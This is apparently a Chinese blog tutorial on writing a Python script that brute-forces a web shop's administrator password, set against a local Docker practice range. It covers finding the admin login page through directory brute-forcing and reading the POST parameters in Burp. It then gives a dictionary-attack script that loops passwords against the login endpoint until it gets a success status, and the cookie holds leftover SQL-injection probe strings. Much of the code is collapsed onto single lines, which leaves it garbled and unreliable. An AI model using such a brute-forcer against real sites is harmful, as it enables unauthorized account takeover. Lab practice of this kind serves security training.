脚本"/>
用python写一个爆破网站管理员密码脚本
文章目录
- 拉取环境
- 寻找登录界面
- 寻找参数
- 编写脚本
- 试验效果
拉取环境
靶场环境是docker环境,把docker靶场映射到本机的7777端口,以便访问
docker pull docker.io/zksmile/vul
docker run -d -p 7777:80 --name shop zksmile/vul:secshop_v2
首页:
寻找登录界面
在注用户注册页面发现admin不能注册,猜测admin为管理员账户
通过爆破目录发现 192.168.171.102:7777/admin.php
为管理登录界面
寻找参数
用burp拦截观察http数据包,关于burp的使用可以看这篇文章 DVWA 暴力破解
可以看到用户名密码是用post传输的,密码错误的响应值是 -1,猜测密码正确的话返回值是1
编写脚本
根据以上这些信息进行编写python脚本,代码解释我放到注释里了:
import sys
import requests
import jsonlogo = r"""____ _ _____
| __ ) _ __ _ _| |_ ___ | ___|__ _ __ ___ ___
| _ \| '__| | | | __/ _ \ | |_ / _ \| '__/ __/ _ \
| |_) | | | |_| | || __/ | _| (_) | | | (_| __/
|____/|_| \__,_|\__\___| |_| \___/|_| \___\___|
"""
def brute(url, header ,params):i = 0#查看文件行数with open('passwd.txt','r') as f:global lineslines = f.readlines()lines = str(len(lines))username = 'admin' #这里username是固定的#打开密码字典文件for passwd in open("passwd.txt"):i += 1password = passwd.strip() #strip删除开头和结尾的空格payload = { #指定post发送的数据'loginName':username,'loginPwd':password,'verify':'DGHA'}#发送post请求response = requests.post(url=url, data=payload, params=params, headers=header)#获取结果result = json.loads(response.content)#如果结果值为1,则密码正确,退出程序!!!if result["status"] == 1:print('------------------------------------')print("\033[92m" + 'password is : ' + password + '\n' + "\033[0m")sys.exit()#输出测试值print("\033[91m" + '[*]' + str(i) + '/'+ lines + ' ' + password + "\033[0m",end='\r')return idef main():print(logo)#proxies = {'http':'http://127.0.0.1:8080'}url = "http://192.168.171.102:7777/index.php"#指定user_agent和cookieheader = {'User_Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0','Cookie':'areaId2=110100; WSTMALLviewGoods=think%3A%5B%22102%22%2C%22258%22%2C%22103%22%2C%22101%22%2C%22101%2Bor%2B1%253D1%22%2C%2287654%2Bor%2B1%253D1%22%2C%22101%2Border%2Bby%2B1%22%2C%22101%2Border%2Bby%2B10%22%2C%22101%2Border%2Bby%2B30%22%2C%22101%2Border%2Bby%2B300%22%2C%22101%2Border%2Bby%2B30000%22%2C%22101%2B%2Band%2B1%253D1%22%2C%22260%22%2C%22101%2Band%2B1%253D1%22%2C%22110%22%5D; loginName=test1; loginPwd=NWExMDVlOGI5ZDQwZTEzMjk3ODBkNjJlYTIyNjVkOGE%3D; PHPSESSID=88sjapamh02cbo40fcj9flc1j5; WSTMALLbstreesAreaId3=110101'}#指定get方式传参的值params = {'m':'Admin','c':'index','a':'login'}i = brute(url, header, params)print('-----------------------------------------------------')print("\033[91m" +'尝试了' + str(i) + '次,字典中没有正确密码!' + "\033[0m")if __name__ == "__main__":main()
试验效果
密码错误效果:
更多推荐
用python写一个爆破网站管理员密码脚本
发布评论